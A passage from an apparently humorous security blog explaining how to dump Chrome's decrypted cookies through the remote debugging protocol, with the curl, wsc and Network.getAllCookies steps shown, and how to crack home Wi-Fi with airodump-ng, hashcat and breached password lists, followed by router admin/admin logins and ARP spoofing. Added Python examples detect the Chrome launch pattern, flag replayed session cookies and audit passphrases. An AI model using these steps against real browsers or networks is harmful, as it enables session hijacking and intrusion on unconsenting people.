<p>When I was trying to figure out whether this was possible, I stumbled across this page: <a href="https://chromedevtools.github.io/devtools-protocol/">https://chromedevtools.github.io/devtools-protocol/</a></p>
<p>This is some documentation for the Protocol used by the Chrome Developer Tools (<code class="language-plaintext highlighter-rouge">Right Click > Inspect Element</code>, our trusted friend and ally). Presumably, on this page, some nice people at Google are graciously going to explain to me, an Outsider, how to use their Ancient and Powerful magic.</p>
<p>They say “hey, if you want to remotely debug Chrome, you need to speak the Remote Debugging Protocol.”
I’m ready for this page to teach me about how to remotely debug Chrome, but it says “we don’t release that kind of information to punks like you”.</p>
<p>They casually tell you to sniff and reverse-engineer the protocol if you want to know how it works, since the only client that speaks it is the Chrome Dev Tools themselves. The way they tell you to sniff it is using the Chrome Dev Tools to debug the <em>CHROME DEV TOOLS THEMSELVES</em>, and view the websocket data that the <em>first</em> set of Chrome Dev Tools is sending. The ease with which they suggest this solution is quite stressful.</p>
<p>Finally, they have a section called “How is the protocol defined?”, which has two links to json files you’re supposed to read, both of which 404.</p>
<h3 id="how-the-heck-does-remote-debugging-work">How the heck does Remote Debugging work?</h3>
<p>According to the Cursed Document linked above, there’s a secret, barely documented <code class="language-plaintext highlighter-rouge">/json</code> endpoint on the remote debugging port. Let’s view it.</p>
<p>In a new terminal window, run</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -s localhost:9222/json
[ {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A",
"id": "7404BF41DC4E7512E0431577BABCE18A",
"title": "about:blank",
"type": "page",
"url": "about:blank",
"webSocketDebuggerUrl": "ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A"
} ]
</code></pre></div></div>
<p>See that <code class="language-plaintext highlighter-rouge">webSocketDebuggerUrl</code>? That’s what we want.</p>
<h2 id="step-3-issue-the-command-over-the-websocket-protocol">Step 3: Issue the command over the websocket protocol</h2>
<p>With the magic URL we got in the previous step, we can now speak the Ancient Language to control Chrome.</p>
<p>First we’ll need something that can speak the websocket language. You can use anything, but I googled for some tool called <code class="language-plaintext highlighter-rouge">wsc</code>. In the <a href="https://github.com/defaultnamehere/cookie_crimes">proof-of-concept</a> (which I made just for you) the whole thing is done in Python, so you don’t need this.</p>
<h3 id="speak-the-ancient-language">Speak the Ancient Language</h3>
<p>Ready? Let’s do it</p>
<p>Using <code class="language-plaintext highlighter-rouge">wsc</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wsc ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
Connected to ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
>
</code></pre></div></div>
<p>Oooh. Looks like a command prompt. If we knew what to type here, we could tell Chrome what to do.</p>
<p>I’m going to save you the 50 open Chrome tabs, reading of Ruby from 2012 on GitHub, and <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=668932">discovery of the very bug report which created this feature</a> and just show you the command.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>{"id": 1, "method": "Network.getAllCookies"}
[{
"domain": "mail.google.com",
"expires": -1,
"httpOnly": false,
"name": "GMAIL_AT",
"path": "/mail/u/0",
"secure": true,
"session": true,
"size": 42,
"value": <unencrypted cookie value appears here>
},
...<the rest of the cookies>
</code></pre></div></div>
<p><img src="/img/keys.jpg" alt="keys" /></p>
<p>Because we asked nicely, Chrome just <em>gives</em> us the cookies. This bypasses the whole Chrome Safe Storage password thing because Chrome itself decrypts the cookies.</p>
<p>And we did it all without needing to become the root user, or otherwise know Naruto’s password.</p>
<p>You can plug these cookies into a Chrome Extension (for example, <a href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg">EditThisCookie</a>), and you’ll be logged in to Naruto’s gmail if you just go to <code class="language-plaintext highlighter-rouge">mail.google.com</code> in your browser.</p>
<p>Aaaaaand that’s it. Crimes successful. Directed by Quentin Tarantino.</p>
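<p>As an added example (not code from the post or the cookie_crimes project), here is what the launch in Steps 1 to 3 looks like from the defending side: a check over process command lines (constructed <code class="language-plaintext highlighter-rouge">ps -eo pid,args</code> style samples are embedded) that flags a headless Chrome exposing the DevTools port against a persistent profile. The scratch-profile heuristics and the severities are my assumptions, and paths are assumed unquoted as in ps output.</p>

```python
"""Added example, not code from the post or the cookie_crimes project: flag
Chrome launches that match Steps 1 to 3, i.e. a headless Chrome exposing the
DevTools protocol on a persistent (non-scratch) user-data-dir. Input is a list
of '<pid> <args>' strings such as `ps -eo pid,args` prints, or the command
line from an EDR process-creation event; the lines at the bottom are
constructed samples. Unquoted paths are assumed (as in ps output)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# --user-data-dir values often contain spaces in ps output (the macOS default
# path does), so the value runs until the next "--flag" or "scheme:" token.
RE_REMOTE_DEBUG = re.compile(r"--remote-debugging-(?:port(?:=(\d+))?|pipe)\b")
RE_HEADLESS = re.compile(r"--headless(?:=\S+)?\b")
RE_USER_DATA_DIR = re.compile(r"--user-data-dir=(.+?)(?=\s+(?:--|\S+:)|$)")
RE_CHILD = re.compile(r"--type=\S+")   # renderer/gpu/utility child processes

# Profile locations treated as throwaway (test/automation frameworks make these);
# an assumption, tune it for your fleet.
TEMP_MARKERS = ("/tmp/", "/private/tmp/", "/var/folders/", "\\temp\\",
                "puppeteer", "playwright")


@dataclass
class Finding:
    pid: int
    severity: str            # "high" or "medium"
    port: Optional[int]      # None for --remote-debugging-pipe or an omitted port
    user_data_dir: str       # "<default profile>" when the flag is absent
    reason: str


def looks_temporary(path: str) -> bool:
    lowered = path.lower()
    return any(marker in lowered for marker in TEMP_MARKERS)


def inspect_cmdline(pid: int, cmdline: str) -> Optional[Finding]:
    """Return a Finding when this Chrome/Chromium command line exposes the
    DevTools protocol against a persistent profile, otherwise None."""
    if "chrom" not in cmdline.lower() or RE_CHILD.search(cmdline):
        return None                       # not a browser, or a child process
    debug = RE_REMOTE_DEBUG.search(cmdline)
    if not debug:
        return None                       # no debugging endpoint at all
    port = int(debug.group(1)) if debug.group(1) else None
    dir_match = RE_USER_DATA_DIR.search(cmdline)
    user_data_dir = dir_match.group(1).strip() if dir_match else "<default profile>"
    if dir_match and looks_temporary(user_data_dir):
        return None                       # scratch profile: ordinary automation
    if RE_HEADLESS.search(cmdline):
        return Finding(pid, "high", port, user_data_dir,
                       "headless Chrome with DevTools open on a persistent profile "
                       "(the cookie-dump launch pattern)")
    return Finding(pid, "medium", port, user_data_dir,
                   "DevTools port open on a persistent profile; any local "
                   "process can read its cookies")


def scan(ps_lines: Iterable[str]) -> List[Finding]:
    """Run inspect_cmdline over '<pid> <args>' lines; skips the ps header row."""
    findings = []
    for line in ps_lines:
        pid_str, _, args = line.strip().partition(" ")
        if not pid_str.isdigit():
            continue                      # blank line or the "PID ARGS" header
        finding = inspect_cmdline(int(pid_str), args)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample output of `ps -eo pid,args` (not real captures).
CONSTRUCTED_PS_LINES = [
    "PID ARGS",
    "4211 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome --headless "
    "--user-data-dir=/Users/naruto/Library/Application Support/Google/Chrome/ "
    "https://gmail.com --remote-debugging-port=9222",
    "4302 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome --type=renderer "
    "--user-data-dir=/Users/naruto/Library/Application Support/Google/Chrome/",
    "5110 /usr/bin/google-chrome --headless --remote-debugging-port=9222 "
    "--user-data-dir=/tmp/puppeteer_dev_profile-x1 about:blank",
    "5200 /usr/bin/google-chrome --remote-debugging-port=9222 "
    "--user-data-dir=/home/dev/.config/google-chrome",
    "6001 /usr/bin/chromium --headless --remote-debugging-port=9222 https://gmail.com",
    "7000 /usr/bin/google-chrome --headless=new --dump-dom https://example.com",
]

if __name__ == "__main__":
    for f in scan(CONSTRUCTED_PS_LINES):
        print(f"[{f.severity}] pid={f.pid} port={f.port} dir={f.user_data_dir}: {f.reason}")
```

A profile without `--user-data-dir` is treated as the default profile on purpose: that is the one the post says holds The Good Stuff.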
<hr />
<p>If you want to try this at home, here’s the code to just straight up do it for you: <a href="https://github.com/defaultnamehere/cookie_crimes">https://github.com/defaultnamehere/cookie_crimes</a>. If you want to try using it on someone else, <a href="https://www.nsa.gov/careers/">maybe this is the website for you</a>.</p>
<h3 id="prevention">Prevention</h3>
<p>If you would not like this attack being used against you, I can wholeheartedly recommend not letting someone else execute code on your computer.</p>
<p>The industry-standard best practice is to rapidly acquire blessed amulets, mysterious crystals of unknown but surely spicy origin, and/or pay-as-you-go racketeering schemes to prevent the aforementioned execution of code.</p>
<p>Failing that, I guess there’s also:</p>
<h4 id="channel-binding-cookies">Channel-binding cookies</h4>
<p>The good folks online have come up with a way to make stealing cookies harder. It’s called <a href="http://www.browserauth.net/channel-bound-cookies">Channel-Bound Cookies</a>. This lets websites ask you to prove that you have a special Token Binding Key before you can use cookies on that website.
This means that if you want to use cookies you stole from someone’s machine, you also have to steal their Token Binding Key, and use it to impersonate their browser.</p>
<p>This feature is <a href="https://www.chromestatus.com/feature/5097603234529280">in Google Chrome</a>, but <a href="https://groups.google.com/a/chromium.org/forum/#!topic/blink-dev/OkdLUyYmY1E">disabled by default</a>, and being removed if I have understood <a href="https://groups.google.com/a/chromium.org/forum/?utm_medium=email&utm_source=footer#!msg/net-dev/AjFQjBmaEQE/_3DM1hwGCQAJ">the heated discussion in this thread</a>. The feature is also in Edge (which is what Internet Explorer is called now, post Identity Crisis).</p>
<p>Even if Chrome used it, most websites don’t use Channel-binding. This is because, well, it’s not much harm to the website if Naruto’s cookies get used by someone else. That’s more Naruto’s problem, in their eyes.</p>
<h3 id="detection">Detection</h3>
<p>In theory, people can detect the theft of cookies. Google, for instance, knows that they gave the Gmail cookie above to Naruto. They can also tell that you, with a different browser, OS, and IP address, might not be Naruto. They can also detect your channel-binding errors. But hey, I haven’t seen this technique fail because of this so far.</p>
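<p>The server-side check described above, as an added example that is neither Google’s code nor the post’s: remember the browser, OS and network a session cookie was issued to, and score later requests that present the same cookie from somewhere else. The User-Agent parsing, the weights and the threshold are assumptions, and the tokens and addresses are constructed.</p>

```python
"""Added example (not Google's code, not from the post): bind a session cookie
to the client context it was issued to and score later uses of it. A browser
or OS change alone forces a step-up check; a network change alone does not,
so a laptop moving between networks keeps working. Weights, threshold and the
coarse User-Agent parsing are assumptions."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ClientContext:
    browser: str   # coarse browser family
    os: str        # coarse OS family
    ip: str        # client address as seen by the server


def context_from_request(user_agent: str, ip: str) -> ClientContext:
    """Reduce a User-Agent header to browser/OS families (deliberately coarse)."""
    if "Firefox/" in user_agent:
        browser = "Firefox"
    elif "Edg/" in user_agent:
        browser = "Edge"
    elif "Chrome/" in user_agent:
        browser = "Chrome"
    elif user_agent.startswith("curl/"):
        browser = "curl"
    else:
        browser = "other"
    if "Mac OS X" in user_agent:
        os_family = "macOS"
    elif "Windows" in user_agent:
        os_family = "Windows"
    elif "Linux" in user_agent:
        os_family = "Linux"
    else:
        os_family = "other"
    return ClientContext(browser, os_family, ip)


def same_network(ip_a: str, ip_b: str) -> bool:
    """Same /24 (IPv4) or /48 (IPv6) counts as the same network, so an address
    change inside a DHCP or NAT pool does not look like theft."""
    a, b = ipaddress.ip_address(ip_a), ipaddress.ip_address(ip_b)
    if a.version != b.version:
        return False
    prefix = 24 if a.version == 4 else 48
    return b in ipaddress.ip_network(f"{a}/{prefix}", strict=False)


# Assumed weights: browser or OS mismatch alone reaches the threshold.
WEIGHTS = {"browser": 3, "os": 3, "network": 2}
STEP_UP_THRESHOLD = 3


class SessionStore:
    """Remembers the context each session token was issued to."""

    def __init__(self) -> None:
        self._issued: Dict[str, ClientContext] = {}

    def issue(self, token: str, ctx: ClientContext) -> None:
        self._issued[token] = ctx

    def check(self, token: str, ctx: ClientContext) -> Tuple[str, int, List[str]]:
        """Return (decision, score, reasons); decision is allow, step_up or reject."""
        issued = self._issued.get(token)
        if issued is None:
            return "reject", 0, ["unknown session token"]
        score, reasons = 0, []
        if issued.browser != ctx.browser:
            score += WEIGHTS["browser"]
            reasons.append(f"browser {issued.browser} -> {ctx.browser}")
        if issued.os != ctx.os:
            score += WEIGHTS["os"]
            reasons.append(f"os {issued.os} -> {ctx.os}")
        if not same_network(issued.ip, ctx.ip):
            score += WEIGHTS["network"]
            reasons.append(f"network {issued.ip} -> {ctx.ip}")
        decision = "step_up" if score >= STEP_UP_THRESHOLD else "allow"
        return decision, score, reasons


# Constructed sample: the cookie was issued to Naruto's Chrome on a Mac.
NARUTO_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36")
THIEF_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"


def demo() -> List[Tuple[str, int, List[str]]]:
    store = SessionStore()
    store.issue("sess-constructed-1", context_from_request(NARUTO_UA, "203.0.113.10"))
    return [
        store.check("sess-constructed-1", context_from_request(NARUTO_UA, "203.0.113.77")),  # same NAT pool
        store.check("sess-constructed-1", context_from_request(NARUTO_UA, "198.51.100.7")),  # new network
        store.check("sess-constructed-1", context_from_request(THIEF_UA, "198.51.100.7")),   # replayed cookie
        store.check("sess-unknown", context_from_request(THIEF_UA, "198.51.100.7")),         # never issued
    ]


if __name__ == "__main__":
    for decision, score, reasons in demo():
        print(decision, score, reasons)
```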
<h1 id="faq">FAQ</h1>
<h3 id="wait-so-you-have-to-already-be-running-code-on-someones-computer-for-this-to-work-thats-not-a-big-deal-at-all">Wait so you have to already be running code on someone’s computer for this to work? That’s not a big deal at all!</h3>
<p>I mean yeah pretty much you’re right. It’s not that big a deal. Nobody panic. Everybody stay cool. The kinds of people who are stealing people’s browser cookies are just gonna have an easier time since there’s no more decrypting.</p>
<h3 id="why-is-this-even-good-then">Why is this even good then?</h3>
<ul>
<li>You don’t need to know someone’s password to do it (unlike other methods)</li>
<li>It’s simple (<a href="https://github.com/defaultnamehere/cookie_crimes">one command</a> to run)</li>
</ul>
<p>I’m pretty sure this is the best way of getting Chrome cookies once you’re in someone’s computer. I sure wouldn’t bother with any other method.</p>
<h3 id="are-you-going-to-tell-google-about-this-critical-security-flaw">Are you going to tell Google about this critical security flaw?</h3>
<p>Nah, they know about it. It’s a feature of Chrome, after all. I even saw them <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=668932">deciding to add it</a>.</p>
<p>UPDATE: I told ‘em about it juuuuuust in case.</p>
<blockquote>
<p>I have to say this is working as intended. The remote debugging protocol is meant to provide full access, including cookies, and running Chrome with a flag makes it work.</p>
</blockquote>
<blockquote>
<p>I am surprised cookies can be read from a headful Chrome profile by the headless Chrome. We have plans to make profiles inter-operable, but that didn’t happen yet. Maybe cookies are supported though, I didn’t look too close.</p>
</blockquote>
<p>Thanks Google!</p>
<h3 id="isnt-it-kinda-irresponsible-to-publish-this-outta-nowhere">Isn’t it kinda irresponsible to publish this outta nowhere?</h3>
<p>see you in hell i guess</p>
<h3 id="my-head-hurts-a-little-and-i-feel-tired">My head hurts a little and I feel tired.</h3>
<p>Maybe you’re dehydrated. Try drinking some crisp cool water.</p>
<h3 id="does-this-work-on-firefox-or-shifty-eyes-internet-exploreredge">Does this work on Firefox or <em>shifty eyes</em> Internet Explorer/Edge?</h3>
<p>Dunno, I haven’t tried it and I have no idea how these browsers work. <em>You</em> could try finding out.</p>
<p>UPDATE: Ya boi wunderwuzzi23 did this for <a href="https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/">Firefox</a> and <a href="https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/">Microsoft Edge</a>.</p>
<h3 id="hey-so-how-did-you-end-up-finding-this-like-why-did-you-need-to-get-someones-chrome-cookies-in-the-first-place">Hey so how did you end up finding this? Like why did you need to get someone’s Chrome cookies in the first place?</h3>
<p>Thanks for taking the time to read this blog post.</p>
<hr />
<p>I wrote this because they were out of pearls at the bubble tea place. You can talk to me about it on Twitter if you want: <a href="https://twitter.com/mangopdf">@mangopdf</a></p>
<hr />
<p>Thanks to <a href="https://twitter.com/hackgnar">@hackgnar</a>, who wondered aloud “there must be <em>some</em> way to get the cookies without root, since the user can get their own cookies”.</p>
<p>Thanks also to <a href="https://twitter.com/noncetonic">@noncetonic</a> and wardolphin, for their guidance in pointing out that headless Chrome and remote debugging is a scary combination.</p>
<p>mangopdf: I found a new way to trick Google Chrome into giving up its secrets.</p>
<hr />
<h1>Hacking your neighbour’s Wi-Fi</h1>
<p>Published 2018-01-01T05:20:38+00:00. Link: /hacking-your-neighbours-wifi</p>
<p>Hey kid, wanna hack some Wi-Fi?</p>
<p>This article is your 100% lactose-free guide to hacking home Wi-Fi. By the end it’s okay to feel afraid, insecure, or even the urge to bulk-purchase home networking equipment. It’s okay. We’ve all been there.</p>
<hr />
<p>Isn’t it strange how when you move into a place and get an internet connection, you typically get given a home router as part of the package? Isn’t it strange how this router is held together using nothing but matchsticks, broken promises, and man’s hubris?</p>
<p><img src="/img/routerinterface.png" alt="routerinterface" /></p>
<p>Did you know that <a href="https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack">anyone nearby can kick you off a Wi-Fi network?</a></p>
<p>Did you know your phone <a href="https://www.crc.id.au/tracking-people-via-wifi-even-when-not-connected/">constantly broadcasts the names and locations (by proxy) of every Wi-Fi network you’ve ever connected to?</a></p>
<p>Yeah it’s all pretty broken hey?</p>
<p>Below are the steps for breaking it more.</p>
<h3 id="step-0-dont-actually-do-this">Step 0: Don’t actually do this</h3>
<p>I’m using “your neighbour” as an easy-to-remember example here.</p>
<p>You might be having what seems like a genius idea, and that’s “wowee I should hack my neighbour’s wifi because uhhhhhh”. This idea is a bad one, in the same way that trying to break into your neighbour’s house is a bad idea.</p>
<p>If you want to actually hack some Wi-Fi, try disconnecting and doing this to your own Wi-Fi.</p>
<h3 id="step-1-find-the-right-wi-fi">Step 1: Find the right Wi-Fi</h3>
<p>So in our 99.99999% theoretical scenario, you and your laptop are within range of your neighbour’s Wi-Fi router. You don’t know the password, but you want to connect. Time to do some crimes.</p>
<p>The first thing you’d do is take out your laptop and run <a href="https://google.com/?q=aircrack-ng">airodump-ng</a>, a tool for precisely the job of hacking Wi-Fi.</p>
<p>Here’s what it looks like.
<img src="/img/airodump_censored.png" alt="bssids" /></p>
<p>You see the names of nearby Wi-Fi networks and also their “BSSID”, which is a bit like an ID for Wi-Fi networks. It’s actually <em>exactly</em> like that.</p>
<h3 id="step-2-get-the-password-hash">Step 2: Get the password hash</h3>
<p>Once you know the BSSID of your neighbour’s Wi-Fi, the goal is to get the Wi-Fi password. The router won’t tell you the Wi-Fi password, but it will give up the <em>password hash<sup id="fnref:corrections" role="doc-noteref"><a href="#fn:corrections" class="footnote" rel="footnote">1</a></sup></em>.</p>
<p>A password hash is like a scrambled version of the password. You can’t unscramble it. Kinda like how you can’t unscramble scrambled eggs back into the white and the yolk.</p>
<p>We’re going to find the hash by watching……the secret handshake.</p>
<h4 id="the-secret-handshake">The secret handshake</h4>
<p>You heard me.</p>
<h5 id="is-that-real">“is that real”</h5>
<p>You might be wondering why there’s a secret handshake happening every time you connect to Wi-Fi, and that’s fair enough, I’m glad you asked.</p>
<p>Let’s say you’re a legitimate businessperson just connecting to your home Wi-Fi. No funny business. You know the password. But you need to prove to the Wi-Fi that you know the password. And the Wi-Fi needs to prove to you that <em>it</em> knows the password. The trouble is, everyone else can hear you.</p>
<p>Wi-Fi is broadcast as radio waves out of your device and router all the time. Anyone within range can hear what you’re saying.</p>
<p>It’s kinda like if you came up to me at a party and you said “I know your Facebook password”. It gets real tense. I nervously glance up at you and say “Really?”. I want to know if you really do know my Facebook password, but I also don’t want you to just say “Your Facebook password is cooldude69” because everyone else at the party is listening.</p>
<hr />
<p>So, the secret handshake lets you and the Wi-Fi router both prove you know the password without saying it.</p>
<h5 id="eavesdropping">Eavesdropping</h5>
<p>The trick is that by spying on the handshake, an eavesdropper (that’s us) could see:</p>
<ul>
<li>A randomly chosen bit of text (e.g. <code class="language-plaintext highlighter-rouge">3b5ef</code>)</li>
<li>The same text, encrypted with the Wi-Fi password as the key (<code class="language-plaintext highlighter-rouge">b8%&G</code>)</li>
</ul>
<p>You know the text, you know what it encrypts to, and you know how to do the encryption. The only thing you don’t know is what the key is. This means that you can guess something as the key, and <em>check</em> if your guess was right.</p>
<hr />
<p><em>We see “3b5ef” encrypts to “b8%&G”</em></p>
<p><em>Try encrypting “3b5ef” with key “password1” -> “AAERJ” // Wrong!</em></p>
<p><em>Try encrypting “3b5ef” with key “cooldad1964” -> “b8%&G” // Found it!</em></p>
<hr />
<p>What if you just encrypt the text <code class="language-plaintext highlighter-rouge">3b5ef</code> with <code class="language-plaintext highlighter-rouge">cooldad1964</code> as the key, and it happens to encrypt to <code class="language-plaintext highlighter-rouge">b8%&G</code>?</p>
<p>Then you know that the password was <code class="language-plaintext highlighter-rouge">cooldad1964</code>. And if <code class="language-plaintext highlighter-rouge">3b5ef</code> encrypts to something else, then you know your guess was wrong.</p>
<h2 id="step-3-crack-the-password">Step 3: Crack the password</h2>
<p>So using the trick above, we’re going to just <em>guess</em> the password. The trick is that we’re going to be able to guess passwords way faster than if we were just typing them into the “Enter the password for this Wi-Fi network” box.</p>
<p>So, get out your pen and paper and blow the dust off that compass and straightedge because it’s time to do some encryption.</p>
<p>Just kidding, we’re not going to use pen and paper you big bozo. We’re going to use a graphics card.</p>
<p>Graphics cards are the part inside a computer that lets the computer be able to play 3D games such as PLAYERUNKNOWN’S ALLCAPS Murder Paradise and Viva Piñata: Party Animals. They also happen to be really fast at encrypting stuff.</p>
<p>So we’re going to get a big list of millions of passwords, and try them all to try and guess the Wi-Fi password.</p>
<h3 id="artisanal_passwordstxt">artisanal_passwords.txt</h3>
<p>Alright so you know how websites get hacked?</p>
<p>Sometimes, the hackers release the passwords of everyone on the website at the time it got hacked. You may have heard of these as “data breaches”.
Sites that got hacked recently and had passwords publicly exposed include LinkedIn, Adobe, and Myspace.</p>
<p>You, a person with an internet connection, can find these lists via Google. No dark web, no getting behind 7 proxies and insisting that your parents only call you by your “code name”, no nothing.</p>
<p><strong>There are two kinds of home Wi-Fi networks</strong>: The kind that are called <code class="language-plaintext highlighter-rouge">NETGEAR-7BDFC</code>, which probably have randomly generated passwords, and the kind that are called <code class="language-plaintext highlighter-rouge">Chris & Liz 2013</code>, with passwords that are in these password lists.</p>
<p>I’m going to guess that your neighbour’s password is probably in one of the heaps big lists of passwords. But to find out which one it is, we’re going to have to encrypt <code class="language-plaintext highlighter-rouge">3b5ef</code> (in this example) with every single password in the list as the encryption key<sup id="fnref:wrongagain" role="doc-noteref"><a href="#fn:wrongagain" class="footnote" rel="footnote">2</a></sup>, and see if any of them match what we saw the Wi-Fi password encrypt to (<code class="language-plaintext highlighter-rouge">b8%&G</code>).</p>
<p>(If your neighbour has one of those randomly generated passwords, then you’re out of luck. JUST kidding <a href="https://www.darknet.org.uk/2010/09/wifite-mass-wifi-wepwpa-key-cracking-tool/">click here for a fun time</a>.)</p>
<p>Now that you’ve “acquired” these password lists, you gotta figure out which password is the Wi-Fi password.</p>
<h3 id="rapid-fire-password-guessing">Rapid-fire password guessing</h3>
<p>Hashcat is software that can take a password list and a hash<sup id="fnref:hashing" role="doc-noteref"><a href="#fn:hashing" class="footnote" rel="footnote">3</a></sup> (“b8%&G”) and try to “unhash” it by comparing it to all the passwords in the list. To give you an estimate of how long this takes, my computer can check 10 million passwords in about 10 minutes. Specialised computers overflowing with graphics cards can do this in seconds.</p>
<p>You just plug the file containing the handshake that you got in Step 2 into hashcat, as well as your password lists.</p>
<p><img src="/img/hashcat.png" alt="hashcat" /></p>
<p><strong>And that’s it</strong>. Hashcat will likely just spit out the password, and you can just type it in the Wi-Fi “Enter the password” box. The main part is furiously guessing millions of passwords until we find the right one.</p>
<h3 id="why-does-this-work">Why does this work?</h3>
<p>Because people pick easy-to-guess passwords. English word with the first letter maybe capitalised then one or two numbers? That pattern covers a <em>lot</em> of people’s passwords and a computer can just quickly check all of them.</p>
<p>If you’re an average internet user, your password for everything is the same, and it’s your pet’s name followed by your house number. Even worse, it’s probably a password hackers already have in their password lists. What I’m saying is that on average, most Wi-Fi passwords people choose don’t stand a chance against these password lists.</p>
<p>You can check whether your password has been stolen by hackers (and published) by browsing to <a href="https://haveibeenpwned.com">https://haveibeenpwned.com</a></p>
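<p>As an added example (not from the post), a passphrase audit built on the argument above: it checks a candidate Wi-Fi passphrase against a constructed stand-in for a leaked password list and against the word-plus-one-or-two-digits pattern, and estimates how long the list-driven search from the Eavesdropping section would take at the post’s quoted rate of 10 million guesses in about 10 minutes. The dictionary size is an assumption.</p>

```python
"""Added example, not from the post: audit a Wi-Fi passphrase against the
reasons the post gives for why cracking works (it sits in a leaked list, or it
is an English word plus one or two digits) and estimate how long the search
would take at the post's quoted rate of 10 million guesses in about
10 minutes. BREACHED is a constructed stand-in for the multi-million-entry
lists the post refers to; DICTIONARY_WORDS is an assumption."""
import re

GUESSES_PER_SECOND = 10_000_000 / 600    # the post's figure: 10M in ~10 minutes
DICTIONARY_WORDS = 170_000               # assumed size of an English wordlist
MIN_WPA_LEN, MAX_WPA_LEN = 8, 63         # WPA/WPA2-PSK passphrase length limits

# Constructed stand-in for a leaked password list.
BREACHED = {"password1", "cooldude69", "cooldad1964", "iloveyou", "letmein1"}

# "English word with the first letter maybe capitalised then one or two numbers".
WEAK_PATTERN = re.compile(r"^[A-Za-z]{3,}[0-9]{1,2}$")


def keyspace_for_pattern() -> int:
    """Guesses to exhaust word x (lowercase|Capitalised) x (0-9 or 00-99)."""
    return DICTIONARY_WORDS * 2 * (10 + 100)


def random_keyspace(length: int, alphabet_size: int = 62) -> int:
    """Guesses to exhaust a uniformly random passphrase over [A-Za-z0-9]."""
    return alphabet_size ** length


def seconds_to_cover(keyspace: int) -> float:
    return keyspace / GUESSES_PER_SECOND


def describe_seconds(secs: float) -> str:
    """Human-readable worst-case search time."""
    if secs < 60:
        return f"{secs:.0f} seconds"
    if secs < 3600:
        return f"{secs / 60:.1f} minutes"
    if secs < 86400:
        return f"{secs / 3600:.1f} hours"
    if secs < 86400 * 365:
        return f"{secs / 86400:.1f} days"
    return f"{secs / (86400 * 365):.3g} years"


def audit(passphrase: str) -> dict:
    """Classify a candidate passphrase and give the worst-case search time."""
    if not MIN_WPA_LEN <= len(passphrase) <= MAX_WPA_LEN:
        return {"verdict": "invalid", "worst_case_seconds": 0.0,
                "why": f"WPA2-PSK passphrases must be {MIN_WPA_LEN}-{MAX_WPA_LEN} characters"}
    if passphrase in BREACHED:
        return {"verdict": "breached", "worst_case_seconds": 0.0,
                "why": "appears verbatim in a leaked password list"}
    if WEAK_PATTERN.match(passphrase):
        secs = seconds_to_cover(keyspace_for_pattern())
        return {"verdict": "weak", "worst_case_seconds": secs,
                "why": "word plus 1-2 digits; the list-driven search finishes in "
                       + describe_seconds(secs)}
    secs = seconds_to_cover(random_keyspace(len(passphrase)))
    return {"verdict": "not_obviously_weak", "worst_case_seconds": secs,
            "why": "no known weak pattern; if random, exhaustive search takes "
                   + describe_seconds(secs)}


if __name__ == "__main__":
    for candidate in ("cooldad1964", "Sunflower42", "short1", "xk3Qp9wLm2Rt"):
        result = audit(candidate)
        print(f"{candidate!r}: {result['verdict']} ({result['why']})")
```

The "not_obviously_weak" estimate is an upper bound that only holds for a genuinely random passphrase; a phrase made of dictionary words is attacked with word-combination rules, not exhaustive search.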
<hr />
<h1 id="so-what">So what?</h1>
<p>So you can probably hack home Wi-Fi. What’s the point of doing it?</p>
<h2 id="finding-your-neighbours-isp-password">Finding your neighbour’s ISP password</h2>
<p>Routers often store the password used to connect to the ISP in their admin pages.</p>
<p>This password would let you prove that you are your neighbour when talking to their ISP. You can cancel their internet altogether. You can see their billing information. You are them.</p>
<p>Let me walk you through the complex process of hacking a home router.</p>
<p>First you open up the popular hacking software, Google Chrome, and go to 192.168.0.1, which is usually the IP address of the router.</p>
<p>When you get there, you’ll see something like this.</p>
<p><img src="https://i.imgur.com/gXaUvVv.png" alt="adminadmin" /></p>
<p>Easiest <code class="language-plaintext highlighter-rouge">admin/admin</code> of your LIFE right there.</p>
<p>Once you’re in the router, the password is in the config page.</p>
<p><img src="/img/routerpassword.png" alt="router1" />
Oh no! The password is just dots! Your hacking career is over before it started!</p>
<p>Fear not, young keyboard warlock, for there is a deus ex machina that saves you in this cutscene.</p>
<p>You can <code class="language-plaintext highlighter-rouge">Right Click > Inspect Element</code> (hacker voice: i’m in) on the password field, and you’ll see this:</p>
<p><img src="/img/routerpasswordhtml.png" alt="router2" />
Edit that HTML to remove the <code class="language-plaintext highlighter-rouge">type="password"</code> aaaaaaand
<img src="/img/routerpasswordrevealed.png" alt="router3" /></p>
<p>That’s right, the dots were only put there by <em>your</em> browser. The password was under them all along. You were trapped in a prison of your own mind.</p>
<h2 id="steal-your-neighbours-data">Steal your neighbour’s data</h2>
<p>So this one isn’t as cool as it used to be, but using ancient forbidden techniques like <a href="https://en.wikipedia.org/wiki/ARP_spoofing">ARP poisoning</a> (not nearly as cool as it sounds), you can spy on what your neighbour is sending to the internet.</p>
<p>This won’t work for websites with that lovingly hand-forged green HTTPS lock, since your neighbour’s data will be encrypted.
But, there are still plenty of sites that will ask for your password or credit card information over plain ol’ HTTP.</p>
